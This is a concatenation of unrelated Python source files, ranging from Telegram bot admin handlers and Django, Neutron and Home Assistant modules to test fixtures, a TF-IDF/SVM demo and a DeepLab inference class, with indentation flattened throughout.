- /sudodemote: demotes the user from SUDO USER
"""
__mod_name__ = "SUDO"
SUDOPROMOTE_HANDLER = CommandHandler("sudopromote", sudopromote, pass_args=True, filters=Filters.user(OWNER_ID))
SUDODEMOTE_HANDLER = CommandHandler("sudodemote", sudodemote, pass_args=True, filters=Filters.user(OWNER_ID))
dispatcher.add_handler(SUDOPROMOTE_HANDLER)
dispatcher.add_handler(SUDODEMOTE_HANDLER)
|
class Solution:
def canVisitAllRooms(self, rooms: List[List[int]]) -> bool:
visited = len(rooms)*[False]
def DFS(visited: [], key: int):
visited[key] = True
for k in rooms[key]:
if visited[k] == False:
DFS(visited, k)
DFS(visited, 0)
if not False in visited:
return True
else:
return False
|
from mock import MagicMock
import pytest
from django.db import models
from django.db.models.query import QuerySet
from django_filters import filters
from django_filters import FilterSet
import graphene
from graphene.relay import Node
from graphene_django import DjangoObjectType
from graphene_django.utils import DJANGO_FILTER_INSTALLED
from ...compat import ArrayField
pytestmark = []
if DJANGO_FILTER_INSTALLED:
from graphene_django.filter import DjangoFilterConnectionField
else:
pytestmark.append(
pytest.mark.skipif(
True, reason="django_filters not installed or not compatible"
)
)
STORE = {"events": []}
@pytest.fixture
def Event():
class Event(models.Model):
name = models.CharField(max_length=50)
tags = ArrayField(models.CharField(max_length=50))
return Event
@pytest.fixture
def EventFilterSet(Event):
from django.contrib.postgres.forms import SimpleArrayField
class ArrayFilter(filters.Filter):
base_field_class = SimpleArrayField
class EventFilterSet(FilterSet):
class Meta:
model = Event
fields = {
"name": ["exact"],
}
tags__contains = ArrayFilter(field_name="tags", lookup_expr="contains")
tags__overlap = ArrayFilter(field_name="tags", lookup_expr="overlap")
return EventFilterSet
@pytest.fixture
def EventType(Event, EventFilterSet):
class EventType(DjangoObjectType):
class Meta:
model = Event
interfaces = (Node,)
filterset_class = EventFilterSet
return EventType
@pytest.fixture
def Query(Event, EventType):
class Query(graphene.ObjectType):
events = DjangoFilterConnectionField(EventType)
def resolve_events(self, info, **kwargs):
events = [
Event(name="Live Show", tags=["concert", "music", "rock"],),
Event(name="Musical", tags=["movie", "music"],),
Event(name="Ballet", tags=["concert", "dance"],),
]
STORE["events"] = events
m_queryset = MagicMock(spec=QuerySet)
m_queryset.model = Event
def filter_events(**kwargs):
if "tags__contains" in kwargs:
STORE["events"] = list(
filter(
lambda e: set(kwargs["tags__contains"]).issubset(
set(e.tags)
),
STORE["events"],
)
)
if "tags__overlap" in kwargs:
STORE["events"] = list(
filter(
lambda e: not set(kwargs["tags__overlap"]).isdisjoint(
set(e.tags)
),
STORE["events"],
)
)
def mock_queryset_filter(*args, **kwargs):
filter_events(**kwargs)
return m_queryset
def mock_queryset_none(*args, **kwargs):
STORE["events"] = []
return m_queryset
def mock_queryset_count(*args, **kwargs):
return len(STORE["events"])
m_queryset.all.return_value = m_queryset
m_queryset.filter.side_effect = mock_queryset_filter
m_queryset.none.side_effect = mock_queryset_none
m_queryset.count.side_effect = mock_queryset_count
m_queryset.__getitem__.side_effect = STORE["events"].__getitem__
return m_queryset
return Query
|
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import abc
from neutron_lib.api import validators
from neutron_lib import exceptions
from oslo_serialization import jsonutils
import six
from neutron._i18n import _
from neutron.api import extensions
from neutron.api.v2 import attributes as attr
from neutron.api.v2 import base
from neutron import manager
AZ_HINTS_DB_LEN = 255
# resource independent common methods
def convert_az_list_to_string(az_list):
return jsonutils.dumps(az_list)
def convert_az_string_to_list(az_string):
return jsonutils.loads(az_string) if az_string else []
def _validate_availability_zone_hints(data, valid_value=None):
# syntax check only here. existence of az will be checked later.
msg = validators.validate_list_of_unique_strings(data)
if msg:
return msg
az_string = convert_az_list_to_string(data)
if len(az_string) > AZ_HINTS_DB_LEN:
msg = _("Too many availability_zone_hints specified")
raise exceptions.InvalidInput(error_message=msg)
validators.validators['type:availability_zone_hints'] = (
_validate_availability_zone_hints)
# Attribute Map
RESOURCE_NAME = 'availability_zone'
AVAILABILITY_ZONES = 'availability_zones'
AZ_HINTS = 'availability_zone_hints'
# name: name of availability zone (string)
# resource: type of resource: 'network' or 'router'
# state: state of availability zone: 'available' or 'unavailable'
# It means whether users can use the availability zone.
RESOURCE_ATTRIBUTE_MAP = {
AVAILABILITY_ZONES: {
'name': {'is_visible': True},
'resource': {'is_visible': True},
'state': {'is_visible': True}
}
}
EXTENDED_ATTRIBUTES_2_0 = {
'agents': {
RESOURCE_NAME: {'allow_post': False, 'allow_put': False,
'is_visible': True}
}
}
class AvailabilityZoneNotFound(exceptions.NotFound):
message = _("AvailabilityZone %(availability_zone)s could not be found.")
class Availability_zone(extensions.ExtensionDescriptor):
"""Availability zone extension."""
@classmethod
def get_name(cls):
return "Availability Zone"
@classmethod
def get_alias(cls):
return "availability_zone"
@classmethod
def get_description(cls):
return "The availability zone extension."
@classmethod
def get_updated(cls):
return "2015-01-01T10:00:00-00:00"
def get_required_extensions(self):
return ["agent"]
@classmethod
def get_resources(cls):
"""Returns Ext Resources."""
my_plurals = [(key, key[:-1]) for key in RESOURCE_ATTRIBUTE_MAP.keys()]
attr.PLURALS.update(dict(my_plurals))
plugin = manager.NeutronManager.get_plugin()
params = RESOURCE_ATTRIBUTE_MAP.get(AVAILABILITY_ZONES)
controller = base.create_resource(AVAILABILITY_ZONES,
RESOURCE_NAME, plugin, params)
ex = extensions.ResourceExtension(AVAILABILITY_ZONES, controller)
return [ex]
def get_extended_resources(self, version):
if version == "2.0":
return dict(list(EXTENDED_ATTRIBUTES_2_0.items()) +
list(RESOURCE_ATTRIBUTE_MAP.items()))
else:
return {}
@six.add_metaclass(abc.ABCMeta)
class AvailabilityZonePluginBase(object):
"""REST API to operate the Availability Zone."""
@abc.abstractmethod
def get_availability_zones(self, context, filters=None, fields=None,
sorts=None, limit=None, marker=None,
page_reverse=False):
"""Return availability zones which a resource belongs to"""
@abc.abstractmethod
def validate_availability_zones(self, context, resource_type,
availability_zones):
"""Verify that the availability zones exist."""
|
# This is a Django settings file for django-translatable unit testing
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
},
}
INSTALLED_APPS = (
# tested package
'translatable',
# test packages
'package',
'models',
'admin',
)
# Activate code coverage report if required packages are available
try:
import coverage
import testcoverage
except ImportError:
pass
else:
TEST_RUNNER = 'testcoverage.test_runner.TestCoverageTestRunner'
TESTCOVERAGE_APPS = (
'translatable',
)
USE_I18N = True
LANGUAGES = (
('en', "English"),
('es', "Spanish"),
)
|
from .core import Config
def simple():
from optparse import OptionParser
op = OptionParser(usage="\n %prog\n %prog -c config.yaml")
op.add_option('-c', '--config', metavar="FILENAME",
help="Configuration file to parse",
dest="configfile", default=None, type="string")
op.add_option('-n', '--name', metavar="NAME",
help="Name of configuration (default `config`), usefull if you have"
"several configuration in single binary",
dest="name", default="config", type="string")
op.add_option('-f', '--filename', metavar="NAME",
help="Filename to read",
dest="filename", default="config", type="string")
op.add_option('-p', '--print',
help="Print parsed configuration file",
dest="print", default=False, action="store_true")
options, args = op.parse_args()
if args:
op.error("No arguments expected")
cfg = Config(options.name, options.filename)
if options.configfile:
inp = open(options.configfile, 'rt', encoding='utf-8')
else:
import sys
inp = sys.stdin
return cfg, inp, options
|
#!/usr/bin/python
# BSD 3-Clause License
# Copyright (c) 2019, Noam C. Golombek
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import numpy as np
import tensorflow as tf
import timeit
import rospy
from tools import ResizeAndCrop
def load_hypes(model_dir):
import os
import json
if os.path.isdir(model_dir):
hypes_name = os.path.join(model_dir, "deeplab.json")
else:
hypes_name = model_dir
with open(hypes_name, 'r') as f:
return json.load(f)
class DeepLabSegmenter(object):
"""Class to load deeplab model and run inference."""
def __init__(self, model_dir, original_image_size, tensor_io, runCPU, gpu_percent=1):
self.hypes = load_hypes(model_dir)
self.input_tensor = tensor_io["input_tensor"]
self.output_tensor = tensor_io["output_tensor"]
frozen_graph_path = self.hypes['frozen_graph_path']
rospy.logwarn("Deeplab to load: " + frozen_graph_path)
# ---------------------------------------------------------------------
"""Creates and loads pretrained deeplab model."""
self.graph = tf.Graph()
graph_def = None
# Extract frozen graph from given path.
with open(frozen_graph_path, 'rb') as file_handle:
graph_def = tf.GraphDef.FromString(file_handle.read())
if graph_def is None:
raise RuntimeError('Cannot find inference graph in given path.')
with self.graph.as_default():
tf.import_graph_def(graph_def, name='')
config = tf.ConfigProto()
config.gpu_options.per_process_gpu_memory_fraction = gpu_percent
self.sess = tf.Session(graph=self.graph, config=config)
# ---------------------------------------------------------------------
if "input_image_size" in self.hypes.keys():
self.input_image_size = self.hypes["input_image_size"]
else:
self.input_image_size = (641, 361)
self.tools = ResizeAndCrop(self.hypes, original_image_size)
self.output_image_uncropped = None
def run_model_on_image(self, image):
"""A function that sets up and runs an image through KittiSeg
Input: Image to process
Output: way_prediction, time_tf"""
image_for_proc, self.output_image_uncropped = self.tools.preprocess_image(
image, self.output_image_uncropped)
# height, width, channels = image.shape
# resize_ratio = 1.0 * self.input_image_size / max(width, height)
# target_size = (int(resize_ratio * width), int(resize_ratio * height))
# resized_image = image.convert('RGB').resize(
# target_size, Image.ANTIALIAS)
output_image, time_tf = self.run_processed_image(image_for_proc)
# -----------------------------------------------------------------
# Plot confidences as red-blue overlay
# rb_image = seg.make_overlay(image, output_image)
return self.tools.postprocess_image(
output_image, self.output_image_uncropped, image, self.hypes["selected_classes"]), time_tf
def run_processed_image(self, image):
"""Runs inference on a single image.
Args:
image: A PIL.Image object, raw input image.
Returns:
resized_image: RGB image resized from original input image.
seg_map: Segmentation map of `resized_image`.
"""
time__tf_start = timeit.default_timer()
# ---------------------------------
batch_seg_map = self.sess.run(
self.output_tensor,
feed_dict={self.input_tensor: [np.asarray(image)]})
# ---------------------------------
time__tf = timeit.default_timer() - time__tf_start
seg_map = batch_seg_map[0]
return seg_map, time__tf
# def create_pascal_label_colormap():
# """Creates a label colormap used in PASCAL VOC segmentation benchmark.
# Returns:
# A Colormap for visualizing segmentation results.
# """
# colormap = np.zeros((256, 3), dtype=int)
# ind = np.arange(256, dtype=int)
# for shift in reversed(range(8)):
# for channel in range(3):
# colormap[:, channel] |= ((ind >> channel) & 1) << shift
# ind >>= 3
# return colormap
# def label_to_color_image(label):
# """Adds color defined by the dataset colormap to the label.
# Args:
# label: A 2D array with integer type, storing the segmentation label.
# Returns:
# result: A 2D array with floating type. The element of the array
# is the color indexed by the corresponding element in the input label
# to the PASCAL color map.
# Raises:
# ValueError: If label is not of rank 2 or its value is larger than color
# map maximum entry.
# """
# if label.ndim != 2:
# raise ValueError('Expect 2-D input label')
# colormap = create_pascal_label_colormap()
# if np.max(label) >= len(colormap):
# raise ValueError('label value too large.')
# return colormap[label]
|
# Copyright 2014 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
# Initial operations for core resources
from alembic import op
import sqlalchemy as sa
def upgrade():
op.create_table(
'networks',
sa.Column('tenant_id', sa.String(length=255), nullable=True),
sa.Column('id', sa.String(length=36), nullable=False),
sa.Column('name', sa.String(length=255), nullable=True),
sa.Column('status', sa.String(length=16), nullable=True),
sa.Column('admin_state_up', sa.Boolean(), nullable=True),
sa.Column('shared', sa.Boolean(), nullable=True),
sa.PrimaryKeyConstraint('id'))
op.create_table(
'ports',
sa.Column('tenant_id', sa.String(length=255), nullable=True),
sa.Column('id', sa.String(length=36), nullable=False),
sa.Column('name', sa.String(length=255), nullable=True),
sa.Column('network_id', sa.String(length=36), nullable=False),
sa.Column('mac_address', sa.String(length=32), nullable=False),
sa.Column('admin_state_up', sa.Boolean(), nullable=False),
sa.Column('status', sa.String(length=16), nullable=False),
sa.Column('device_id', sa.String(length=255), nullable=False),
sa.Column('device_owner', sa.String(length=255), nullable=False),
sa.ForeignKeyConstraint(['network_id'], ['networks.id'], ),
sa.PrimaryKeyConstraint('id'))
op.create_table(
'subnets',
sa.Column('tenant_id', sa.String(length=255), nullable=True),
sa.Column('id', sa.String(length=36), nullable=False),
sa.Column('name', sa.String(length=255), nullable=True),
sa.Column('network_id', sa.String(length=36), nullable=True),
sa.Column('ip_version', sa.Integer(), nullable=False),
sa.Column('cidr', sa.String(length=64), nullable=False),
sa.Column('gateway_ip', sa.String(length=64), nullable=True),
sa.Column('enable_dhcp', sa.Boolean(), nullable=True),
sa.Column('shared', sa.Boolean(), nullable=True),
sa.Column('ipv6_ra_mode',
sa.Enum('slaac', 'dhcpv6-stateful', 'dhcpv6-stateless',
name='ipv6_ra_modes'),
nullable=True),
sa.Column('ipv6_address_mode',
sa.Enum('slaac', 'dhcpv6-stateful', 'dhcpv6-stateless',
name='ipv6_address_modes'),
nullable=True),
sa.ForeignKeyConstraint(['network_id'], ['networks.id'], ),
sa.PrimaryKeyConstraint('id'))
op.create_table(
'dnsnameservers',
sa.Column('address', sa.String(length=128), nullable=False),
sa.Column('subnet_id', sa.String(length=36), nullable=False),
sa.ForeignKeyConstraint(['subnet_id'], ['subnets.id'],
ondelete='CASCADE'),
sa.PrimaryKeyConstraint('address', 'subnet_id'))
op.create_table(
'ipallocationpools',
sa.Column('id', sa.String(length=36), nullable=False),
sa.Column('subnet_id', sa.String(length=36), nullable=True),
sa.Column('first_ip', sa.String(length=64), nullable=False),
sa.Column('last_ip', sa.String(length=64), nullable=False),
sa.ForeignKeyConstraint(['subnet_id'], ['subnets.id'],
ondelete='CASCADE'),
sa.PrimaryKeyConstraint('id'))
op.create_table(
'subnetroutes',
sa.Column('destination', sa.String(length=64), nullable=False),
sa.Column('nexthop', sa.String(length=64), nullable=False),
sa.Column('subnet_id', sa.String(length=36), nullable=False),
sa.ForeignKeyConstraint(['subnet_id'], ['subnets.id'],
ondelete='CASCADE'),
sa.PrimaryKeyConstraint('destination', 'nexthop', 'subnet_id'))
op.create_table(
'ipallocations',
sa.Column('port_id', sa.String(length=36), nullable=True),
sa.Column('ip_address', sa.String(length=64), nullable=False),
sa.Column('subnet_id', sa.String(length=36), nullable=False),
sa.Column('network_id', sa.String(length=36), nullable=False),
sa.ForeignKeyConstraint(['network_id'], ['networks.id'],
ondelete='CASCADE'),
sa.ForeignKeyConstraint(['port_id'], ['ports.id'], ondelete='CASCADE'),
sa.ForeignKeyConstraint(['subnet_id'], ['subnets.id'],
ondelete='CASCADE'),
sa.PrimaryKeyConstraint('ip_address', 'subnet_id', 'network_id'))
op.create_table(
'ipavailabilityranges',
sa.Column('allocation_pool_id', sa.String(length=36), nullable=False),
sa.Column('first_ip', sa.String(length=64), nullable=False),
sa.Column('last_ip', sa.String(length=64), nullable=False),
sa.ForeignKeyConstraint(['allocation_pool_id'],
['ipallocationpools.id'], ondelete='CASCADE'),
sa.PrimaryKeyConstraint('allocation_pool_id', 'first_ip', 'last_ip'))
op.create_table(
'networkdhcpagentbindings',
sa.Column('network_id', sa.String(length=36), nullable=False),
sa.Column('dhcp_agent_id', sa.String(length=36), nullable=False),
sa.ForeignKeyConstraint(['dhcp_agent_id'], ['agents.id'],
ondelete='CASCADE'),
sa.ForeignKeyConstraint(['network_id'], ['networks.id'],
ondelete='CASCADE'),
sa.PrimaryKeyConstraint('network_id', 'dhcp_agent_id'))
|
from django.contrib import admin
from .models import Order, ProductPurchase #, UserCheckout
# Register your models here.
admin.site.register(Order)
admin.site.register(ProductPurchase)
# admin.site.register(UserCheckout)
|
try:
from builtins import object
except ImportError:
pass
from collections import OrderedDict
from transitions.extensions.nesting import NestedState as State, _build_state_list
from .test_nesting import TestNestedTransitions as TestNested
try:
from unittest.mock import MagicMock
except ImportError:
from mock import MagicMock
class TestParallel(TestNested):
def setUp(self):
super(TestParallel, self).setUp()
self.states = ['A', 'B', {'name': 'C',
'parallel': [{'name': '1', 'children': ['a', 'b'],
'initial': 'a',
'transitions': [['go', 'a', 'b']]},
{'name': '2', 'children': ['a', 'b'],
'initial': 'a',
'transitions': [['go', 'a', 'b']]}]}]
self.transitions = [['reset', 'C', 'A']]
def test_init(self):
m = self.stuff.machine_cls(states=self.states)
m.to_C()
self.assertEqual(['C{0}1{0}a'.format(State.separator), 'C{0}2{0}a'.format(State.separator)], m.state)
def test_enter(self):
m = self.stuff.machine_cls(states=self.states, transitions=self.transitions, initial='A')
m.to_C()
m.go()
self.assertEqual(['C{0}1{0}b'.format(State.separator), 'C{0}2{0}b'.format(State.separator)], m.state)
def test_exit(self):
class Model:
def __init__(self):
self.mock = MagicMock()
def on_exit_C(self):
self.mock()
def on_exit_C_1(self):
self.mock()
def on_exit_C_2(self):
self.mock()
model1 = Model()
m = self.stuff.machine_cls(model1, states=self.states, transitions=self.transitions, initial='A')
m.add_transition('reinit', 'C', 'C')
model1.to_C()
self.assertEqual(['C{0}1{0}a'.format(State.separator), 'C{0}2{0}a'.format(State.separator)], model1.state)
model1.reset()
self.assertTrue(model1.is_A())
self.assertEqual(3, model1.mock.call_count)
model2 = Model()
m.add_model(model2, initial='C')
model2.reinit()
self.assertEqual(['C{0}1{0}a'.format(State.separator), 'C{0}2{0}a'.format(State.separator)], model2.state)
self.assertEqual(3, model2.mock.call_count)
model2.reset()
self.assertTrue(model2.is_A())
self.assertEqual(6, model2.mock.call_count)
for mod in m.models:
mod.trigger('to_C')
for mod in m.models:
mod.trigger('reset')
self.assertEqual(6, model1.mock.call_count)
self.assertEqual(9, model2.mock.call_count)
def test_parent_transition(self):
m = self.stuff.machine_cls(states=self.states)
m.add_transition('switch', 'C{0}2{0}a'.format(State.separator), 'C{0}2{0}b'.format(State.separator))
m.to_C()
m.switch()
self.assertEqual(['C{0}1{0}a'.format(State.separator), 'C{0}2{0}b'.format(State.separator)], m.state)
def test_shallow_parallel(self):
sep = self.state_cls.separator
states = [
{
'name': 'P', 'parallel':
[
'1', # no initial state
{'name': '2', 'children': ['a', 'b'], 'initial': 'b'}
]
},
'X'
]
m = self.machine_cls(states=states, initial='P')
self.assertEqual(['P{0}1'.format(sep), 'P{0}2{0}b'.format(sep)], m.state)
m.to_X()
self.assertEqual('X', m.state)
m.to_P()
self.assertEqual(['P{0}1'.format(sep), 'P{0}2{0}b'.format(sep)], m.state)
def test_multiple(self):
states = ['A',
{'name': 'B',
'parallel': [
{'name': '1', 'parallel': [
{'name': 'a', 'children': ['x', 'y', 'z'], 'initial': 'z'},
{'name': 'b', 'children': ['x', 'y', 'z'], 'initial': 'y'}
]},
{'name': '2', 'children': ['a', 'b', 'c'], 'initial': 'a'},
]}]
m = self.stuff.machine_cls(states=states, initial='A')
self.assertTrue(m.is_A())
m.to_B()
self.assertEqual([['B{0}1{0}a{0}z'.format(State.separator),
'B{0}1{0}b{0}y'.format(State.separator)],
'B{0}2{0}a'.format(State.separator)], m.state)
m.to_A()
self.assertEqual('A', m.state)
def test_multiple_deeper(self):
sep = self.state_cls.separator
states = ['A',
{'name': 'P',
'parallel': [
'1',
{'name': '2', 'parallel': [
{'name': 'a'},
{'name': 'b', 'parallel': [
{'name': 'x', 'parallel': ['1', '2']}, 'y'
]}
]},
]}]
ref_state = ['P{0}1'.format(sep),
['P{0}2{0}a'.format(sep),
[['P{0}2{0}b{0}x{0}1'.format(sep),
'P{0}2{0}b{0}x{0}2'.format(sep)],
'P{0}2{0}b{0}y'.format(sep)]]]
m = self.stuff.machine_cls(states=states, initial='A')
self.assertTrue(m.is_A())
m.to_P()
self.assertEqual(ref_state, m.state)
m.to_A()
def test_model_state_conversion(self):
sep = self.state_cls.separator
states = ['P{0}1'.format(sep),
['P{0}2{0}a'.format(sep),
[['P{0}2{0}b{0}x{0}1'.format(sep),
'P{0}2{0}b{0}x{0}2'.format(sep)],
'P{0}2{0}b{0}y'.format(sep)]]]
tree = OrderedDict(
[('P', OrderedDict(
[('1', OrderedDict()),
('2', OrderedDict(
[('a', OrderedDict()),
('b', OrderedDict(
[('x', OrderedDict(
[('1', OrderedDict()),
('2', OrderedDict())])),
('y', OrderedDict())]
))]
))]
))]
)
m = self.machine_cls()
self.assertEqual(tree, m._build_state_tree(states, sep))
self.assertEqual(states, _build_state_list(tree, sep))
|
# -*- coding: utf-8 -*-
"""
Created on Thu Jan 19 13:23:12 2017
@author: rmatam
"""
# -*- coding: utf-8 -*-
# 2015/01/11
# Script passed in py2 & py3 with Ubuntu 14.04 env.
# Prerequirement: pip install numpy scipy scikit-learn
# furthermore info http://scikit-learn.org/stable/modules/generated/sklearn.feature_extraction.text.TfidfVectorizer.html.
# furthermore info http://scikit-learn.org/stable/modules/classes.html#module-sklearn.svm
# There have a lot of descriptions of setting variables on the website, please check it if you need the further setting.
from sklearn import svm
from sklearn.feature_extraction.text import TfidfVectorizer as tfidf
vec =tfidf(smooth_idf =False)
svc = svm.SVC(kernel='poly') # further settings on website: http://scikit-learn.org/stable/modules/generated/sklearn.svm.SVC.html
# training set, "List" type.
trainset =["good good good good good great great great", # corpus 1
"bad bad bad bad bad bad dirty dirty dirty", # corpus 2
]
trainTag =["pos", "neg"] # corpus's tags.
# test set, "List" type.
testset =["good good good good good great great great",
"good good good good good great great great bad",
"good good good good good great great great bad bad",
"good good good good good great great great bad bad bad",
"good good good good good great great great dirty",
"good good good good good great great great dirty dirty",
"good good good good good great great great dirty dirty dirty",
"bad bad bad bad bad bad dirty dirty dirty",
"bad bad bad bad bad bad dirty dirty dirty good",
"bad bad bad bad bad bad dirty dirty dirty good good",
"bad bad bad bad bad bad dirty dirty dirty good good good",
"bad bad bad bad bad bad dirty dirty dirty great",
"bad bad bad bad bad bad dirty dirty dirty great great",
"bad bad bad bad bad bad dirty dirty dirty great great great",
]
testTag =["pos", "pos", "pos", "pos", "pos", "pos", "pos",
"neg", "neg", "neg", "neg", "neg", "neg", "neg",
]
# training set is converting to the tfidf array.
trainRs =vec.fit_transform(trainset).toarray()
# test set is converting to the tfidf array.
testRs =vec.fit_transform(testset).toarray()
# the tfidf array result of training & test set.
print("Training set tfidf result.")
print(trainRs.shape)
print(trainRs)
print("----------------------------------------")
print("Test set tfidf result.")
print(testRs.shape)
print(testRs)
# training...
svc.fit(trainRs, trainTag) # further settings on website: http://scikit-learn.org/stable/modules/generated/sklearn.svm.SVC.html
# accuracy of the model.
print("----------------------------------------")
accuracy =svc.score(testRs, testTag)
print("SVM model accuracy:")
print(accuracy)
# predicting test set result.
print("----------------------------------------")
predict =svc.predict(testRs)
print("SVM model predict result:")
print(predict)
'''
Console Print:::
Training set tfidf result.
(2, 4)
[[ 0. 0. 0.85749293 0.51449576]
[ 0.89442719 0.4472136 0. 0. ]]
----------------------------------------
Test set tfidf result.
(14, 4)
[[ 0. 0. 0.85749293 0.51449576]
[ 0.16903085 0. 0.84515425 0.50709255]
[ 0.32444284 0. 0.81110711 0.48666426]
[ 0.45749571 0. 0.76249285 0.45749571]
[ 0. 0.16903085 0.84515425 0.50709255]
[ 0. 0.32444284 0.81110711 0.48666426]
[ 0. 0.45749571 0.76249285 0.45749571]
[ 0.89442719 0.4472136 0. 0. ]
[ 0.88465174 0.44232587 0.14744196 0. ]
[ 0.85714286 0.42857143 0.28571429 0. ]
[ 0.81649658 0.40824829 0.40824829 0. ]
[ 0.88465174 0.44232587 0. 0.14744196]
[ 0.85714286 0.42857143 0. 0.28571429]
[ 0.81649658 0.40824829 0. 0.40824829]]
----------------------------------------
SVM model accuracy:
1.0
----------------------------------------
SVM model predict result:
['pos' 'pos' 'pos' 'pos' 'pos' 'pos' 'pos' 'neg' 'neg' 'neg' 'neg' 'neg'
'neg' 'neg']
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2008 John Paulett (john -at- paulett.org)
# All rights reserved.
#
# This software is licensed as described in the file COPYING, which
# you should have received as part of this distribution.
import sys
import timeit
IS_25_DOWN = sys.version_info[:2] <= (2, 5)
number = 1000
mod = 'json'
if IS_25_DOWN:
mod = 'simplejson'
json = """\
import feedparser
import jsonstruct
import jsonstruct.tests.thirdparty_tests as test
doc = feedparser.parse(test.RSS_DOC)
jsonstruct.set_preferred_backend('%s')
pickled = jsonstruct.encode(doc)
unpickled = jsonstruct.decode(pickled)
if doc['feed']['title'] != unpickled['feed']['title']:
print 'Not a match'
""" % mod
print 'Using %s' % mod
json_test = timeit.Timer(stmt=json)
print "%.9f sec/pass " % (json_test.timeit(number=number) / number)
|
"""Support for selects which integrates with other components."""
from __future__ import annotations
import contextlib
import logging
from typing import Any
import voluptuous as vol
from homeassistant.components.select import SelectEntity
from homeassistant.components.select.const import (
ATTR_OPTION,
ATTR_OPTIONS,
DOMAIN as SELECT_DOMAIN,
)
from homeassistant.const import (
CONF_ICON,
CONF_NAME,
CONF_OPTIMISTIC,
CONF_STATE,
CONF_UNIQUE_ID,
)
from homeassistant.core import Config, HomeAssistant
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.entity_platform import AddEntitiesCallback
from homeassistant.helpers.script import Script
from homeassistant.helpers.template import Template, TemplateError
from . import TriggerUpdateCoordinator
from .const import CONF_AVAILABILITY
from .template_entity import TemplateEntity
from .trigger_entity import TriggerEntity
_LOGGER = logging.getLogger(__name__)
CONF_SELECT_OPTION = "select_option"
DEFAULT_NAME = "Template Select"
DEFAULT_OPTIMISTIC = False
SELECT_SCHEMA = vol.Schema(
{
vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.template,
vol.Required(CONF_STATE): cv.template,
vol.Required(CONF_SELECT_OPTION): cv.SCRIPT_SCHEMA,
vol.Required(ATTR_OPTIONS): cv.template,
vol.Optional(CONF_AVAILABILITY): cv.template,
vol.Optional(CONF_OPTIMISTIC, default=DEFAULT_OPTIMISTIC): cv.boolean,
vol.Optional(CONF_UNIQUE_ID): cv.string,
vol.Optional(CONF_ICON): cv.template,
}
)
async def _async_create_entities(
hass: HomeAssistant, definitions: list[dict[str, Any]], unique_id_prefix: str | None
) -> list[TemplateSelect]:
"""Create the Template select."""
entities = []
for definition in definitions:
unique_id = definition.get(CONF_UNIQUE_ID)
if unique_id and unique_id_prefix:
unique_id = f"{unique_id_prefix}-{unique_id}"
entities.append(
TemplateSelect(
hass,
definition.get(CONF_NAME, DEFAULT_NAME),
definition[CONF_STATE],
definition.get(CONF_AVAILABILITY),
definition[CONF_SELECT_OPTION],
definition[ATTR_OPTIONS],
definition.get(CONF_OPTIMISTIC, DEFAULT_OPTIMISTIC),
unique_id,
definition.get(CONF_ICON),
)
)
return entities
async def async_setup_platform(
hass: HomeAssistant,
config: Config,
async_add_entities: AddEntitiesCallback,
discovery_info: dict[str, Any] | None = None,
) -> None:
"""Set up the template select."""
if discovery_info is None:
_LOGGER.warning(
"Template number entities can only be configured under template:"
)
return
if "coordinator" in discovery_info:
async_add_entities(
TriggerSelectEntity(hass, discovery_info["coordinator"], config)
for config in discovery_info["entities"]
)
return
async_add_entities(
await _async_create_entities(
hass, discovery_info["entities"], discovery_info["unique_id"]
)
)
class TemplateSelect(TemplateEntity, SelectEntity):
"""Representation of a template select."""
def __init__(
self,
hass: HomeAssistant,
name_template: Template | None,
value_template: Template,
availability_template: Template | None,
command_select_option: dict[str, Any],
options_template: Template,
optimistic: bool,
unique_id: str | None,
icon_template: Template | None,
) -> None:
"""Initialize the select."""
super().__init__(
availability_template=availability_template, icon_template=icon_template
)
self._attr_name = DEFAULT_NAME
name_template.hass = hass
with contextlib.suppress(TemplateError):
self._attr_name = name_template.async_render(parse_result=False)
self._name_template = name_template
self._value_template = value_template
domain = __name__.split(".")[-2]
self._command_select_option = Script(
hass, command_select_option, self._attr_name, domain
)
self._options_template = options_template
self._attr_assumed_state = self._optimistic = optimistic
self._attr_unique_id = unique_id
self._attr_options = None
self._attr_current_option = None
async def async_added_to_hass(self) -> None:
"""Register callbacks."""
self.add_template_attribute(
"_attr_current_option",
self._value_template,
validator=cv.string,
